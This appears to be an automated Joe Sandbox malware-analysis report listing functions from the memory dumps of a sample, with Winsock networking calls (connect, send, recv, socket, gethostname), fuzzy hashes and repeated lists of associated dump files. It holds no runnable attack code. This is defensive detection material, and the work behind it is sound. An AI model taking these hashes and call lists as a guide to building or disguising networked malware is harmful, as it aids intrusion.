                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: CloseEvent
                                        • String ID: multi.c
                                        • API String ID: 2624557715-214371023
                                        • Opcode ID: ea2e8457b5f566a92a18b587357d857845c0f3fc0e5c4af0d6bb8fad9cd91201
                                        • Instruction ID: 6b031951b9be3cf26538f456aa34725193ac9310d33bc76e9aa017f1c8c81df9
                                        • Opcode Fuzzy Hash: ea2e8457b5f566a92a18b587357d857845c0f3fc0e5c4af0d6bb8fad9cd91201
                                        • Instruction Fuzzy Hash: E051B6B1D043045BDB21AA349C46B6776A8FF95318F084438EE89DA253FB75E909C7D3
                                        Function 008378B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: closesocket
                                        • String ID: FD %s:%d sclose(%d)
                                        • API String ID: 2781271927-3116021458
                                        • Opcode ID: f068197789186e5b34984d8abce2638edde19864e555678dd105dffdea06e8da
                                        • Instruction ID: e1451b4f958875e01cb1fc97aa6d9c6a0e4e36fdde7118e0620e39cc7e5ce332
                                        • Opcode Fuzzy Hash: f068197789186e5b34984d8abce2638edde19864e555678dd105dffdea06e8da
                                        • Instruction Fuzzy Hash: FFD05E7290A2216B85306999AC49C9B7BA8EEC6F20F4A1868F845B7201D121DC4183E3
                                        Function 008331D7 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 73COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID: R
                                        • API String ID: 2962429428-3347607022
                                        • Opcode ID: 3c49a51c62d4fa5bc90a7c1105c8815c242d91a63b928188b91db7164a8c87da
                                        • Instruction ID: ffb9b8e57195963e8e50f60bce3d4567200f51650e32531cfc97afc18ab1479b
                                        • Opcode Fuzzy Hash: 3c49a51c62d4fa5bc90a7c1105c8815c242d91a63b928188b91db7164a8c87da
                                        • Instruction Fuzzy Hash: F63172B49097059BCB00EFB8D58569EBBF4FF44344F008969E898E7341E774DA84CBA2
                                        Function 008FB060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,008FB29E,?,00000000,?,?), ref: 008FB0B9
                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,008E3C41,00000000), ref: 008FB0C1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: ErrorLastconnect
                                        • String ID:
                                        • API String ID: 374722065-0
                                        • Opcode ID: 1245406d7e153bb1f4c0acb5fc802036bb33423ac640ca5c5a491998a45f78be
                                        • Instruction ID: 9a300e5701a33bc2204953ff7267e86bd69ca5e31f421003fc1cb369750c70e6
                                        • Opcode Fuzzy Hash: 1245406d7e153bb1f4c0acb5fc802036bb33423ac640ca5c5a491998a45f78be
                                        • Instruction Fuzzy Hash: 8E01B1322046089BCA205A78C844E7BB399FBC9364F140724EA78E31E1DB26ED509B52
                                        Function 008E4950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • gethostname.WS2_32(00000000,00000040), ref: 008E4AA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: gethostname
                                        • String ID:
                                        • API String ID: 144339138-0
                                        • Opcode ID: 9e2d99afacd11771168f10953ae02f2fb37ac907298fb3f0b159366299a30f62
                                        • Instruction ID: 7789295ed373eae354d7b0dd44709339f585e0f9ed2a9ff6c7d746acaa395664
                                        • Opcode Fuzzy Hash: 9e2d99afacd11771168f10953ae02f2fb37ac907298fb3f0b159366299a30f62
                                        • Instruction Fuzzy Hash: 4D51D3705043808BE7309B66DD4972376E4FF86328F14283CD98ED66E2E7B4E844D706
                                        Function 073E07BA Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: c13673bfd99c9618d52454dcbc03757c1797bd3e2be2bc545af537fa2f873744
                                        • Instruction ID: d858c1bc291a78b7eb762cb8ff8bf954676a41e16858edcd9977b8430be73074
                                        • Opcode Fuzzy Hash: c13673bfd99c9618d52454dcbc03757c1797bd3e2be2bc545af537fa2f873744
                                        • Instruction Fuzzy Hash: 8F5159EB15C125BD710A84826B24EFBA76EE1D7730B318437F80BE5A82E2D44E4E6131
                                        Function 073E0839 Relevance: 1.6, Strings: 1, Instructions: 319COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: 9932e24e6f231ad7d35035f2a067a91967e97c5ded5af9d53c9fb8efa7f5fdcf
                                        • Instruction ID: e1f61d9328bbe0bdb3bd647dd9d19ee5a07ffcbbe934acbd872927305149dcd0
                                        • Opcode Fuzzy Hash: 9932e24e6f231ad7d35035f2a067a91967e97c5ded5af9d53c9fb8efa7f5fdcf
                                        • Instruction Fuzzy Hash: EF516CEB15C125BD720A84812F24EFBA76EE5D7730B318427F80BE5A82E2D44E4E5171
                                        Function 073E07C6 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: 451d8784b69a5cdbab0d3d40fe2daf2d83ee996349a3d5a057b68af73de6f976
                                        • Instruction ID: fdd7e146916ae290d1a3cecff77673447eb8aaee735c3a2711a025d7bde0564f
                                        • Opcode Fuzzy Hash: 451d8784b69a5cdbab0d3d40fe2daf2d83ee996349a3d5a057b68af73de6f976
                                        • Instruction Fuzzy Hash: 03515CEB15C125BD714A84816F24EFBA76EE1D7730B318427F80BE5A82E2D44E4E5171
                                        Function 073E07D9 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: 831b41056735e82cdc1beb025ec1af23077876c444c19ef862c99f3727d1590a
                                        • Instruction ID: 2db5b7c3a205b277f601117c0b31e74140bfdb2fc7d66e67657983cf7bc985a9
                                        • Opcode Fuzzy Hash: 831b41056735e82cdc1beb025ec1af23077876c444c19ef862c99f3727d1590a
                                        • Instruction Fuzzy Hash: B4515CEB15C125BD720A84816F24EFBA76EE1D7730B318437F80BE5A82E2D44E4D5171
                                        Function 073E07F4 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: 293dc30fe378104cd014473a78c2577c54fbe4f5588df3f007a1b2046c70b331
                                        • Instruction ID: 0ebe9cdca3e8e4c120358f12d5d630cdc2427ef5933b0a94aa26d0ff0eebcc22
                                        • Opcode Fuzzy Hash: 293dc30fe378104cd014473a78c2577c54fbe4f5588df3f007a1b2046c70b331
                                        • Instruction Fuzzy Hash: 32516BEB15C125BDB14A84826F24EFBA76EE2D7730B318427F80BE5A82E2D44F4D1171
                                        Function 073E0805 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: ff558680caf1ec3156a594858babcd80601ad35480bb56c18dbf32e80c6cdfed
                                        • Instruction ID: dd6d48c30b0b9b29078c258c17e70fc0aebbacb2dd152ec69df8b9d23800ed09
                                        • Opcode Fuzzy Hash: ff558680caf1ec3156a594858babcd80601ad35480bb56c18dbf32e80c6cdfed
                                        • Instruction Fuzzy Hash: 81513AEB15C135BD714A84826F24AFBA76EE1D7730B318427F80BE5A82E2D84F4E5171
                                        Function 008FAF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • getsockname.WS2_32(?,?,00000080), ref: 008FAFD1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: getsockname
                                        • String ID:
                                        • API String ID: 3358416759-0
                                        • Opcode ID: 7ac1821fa111755a8105bfdc5d961384eda4085a0f8460b24664f55b06c6cdb4
                                        • Instruction ID: 3f68cc410cd9d65211d2cddc718b69851e5e386ade897765685109865b6276b6
                                        • Opcode Fuzzy Hash: 7ac1821fa111755a8105bfdc5d961384eda4085a0f8460b24664f55b06c6cdb4
                                        • Instruction Fuzzy Hash: 6F116A70808785D5EB258F18D8027F6B3F4FFD5329F109519E69946150FB7255C58BC2
                                        Function 008FA920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • send.WS2_32(?,?,?,00000000,00000000,?), ref: 008FA97F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        • Opcode ID: fa3afcfd95f42efc5fb01baa6aec6a1edc44de48cfc8c72cf8d52fb6434f28a1
                                        • Instruction ID: 5178f331d6b6dbeb00aa831fb878290f67864a1752f14fa1c3a3d268f044e6a1
                                        • Opcode Fuzzy Hash: fa3afcfd95f42efc5fb01baa6aec6a1edc44de48cfc8c72cf8d52fb6434f28a1
                                        • Instruction Fuzzy Hash: 8701F7B5B007109FC7148F24DC41B66BBA4FF84730F068559EA981B361C330AC108BD1
                                        Function 073E0863 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: d05dedb03f6d665d3c8167d291c4ce02a83d9314d24639589c63172973b5984b
                                        • Instruction ID: d015365967d4011ed37776d9bb8303216c7ceefc5ee430a5c4b6ca712b57b189
                                        • Opcode Fuzzy Hash: d05dedb03f6d665d3c8167d291c4ce02a83d9314d24639589c63172973b5984b
                                        • Instruction Fuzzy Hash: 17516CEB15C125BD714AC4826F24EFBA76EE2D7730B318427F80BD5A82E2D44E4E5171
                                        Function 073E081A Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473021119.00000000073E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73e0000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5#\
                                        • API String ID: 0-280774400
                                        • Opcode ID: 0dd84dd44f2d79e5302c3550a2a3463cf396a4d087b2aa88a493e9e8d8bde050
                                        • Instruction ID: df245ea65eade2115a588e25f1996da5c6e4d1508da38bf32b6739110072990e
                                        • Opcode Fuzzy Hash: 0dd84dd44f2d79e5302c3550a2a3463cf396a4d087b2aa88a493e9e8d8bde050
                                        • Instruction Fuzzy Hash: 79518DEB15C125BD724AC4826F20EFBA76EE6DB730B318427F80BD5A82E2D44E4D5171
                                        Function 008FA870 Relevance: 1.5, APIs: 1, Instructions: 33networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • recv.WS2_32(000000FF,008E6F4E,000000FF,00000000,00000000,000000FF,008E6F4E,000000FF,?,00000000,?), ref: 008FA8AF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: recv
                                        • String ID:
                                        • API String ID: 1507349165-0
                                        • Opcode ID: df6056ec85b2576a408191b554444ddaeb1a7f327f7cdf1d47a596f0593831e7
                                        • Instruction ID: fc08227a1c0cf593eee6be36cf9dbd62b8005084366e5b90dd51fd8c9acb7418
                                        • Opcode Fuzzy Hash: df6056ec85b2576a408191b554444ddaeb1a7f327f7cdf1d47a596f0593831e7
                                        • Instruction Fuzzy Hash: 81F030B2B157207BD5248A18EC05FABF369EBC4B20F158A19BE44672888370BC0186E2
                                        Function 008FAF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WS2_32(?,008FB280,00000000,-00000001,00000000,008FB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 008FAF67
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
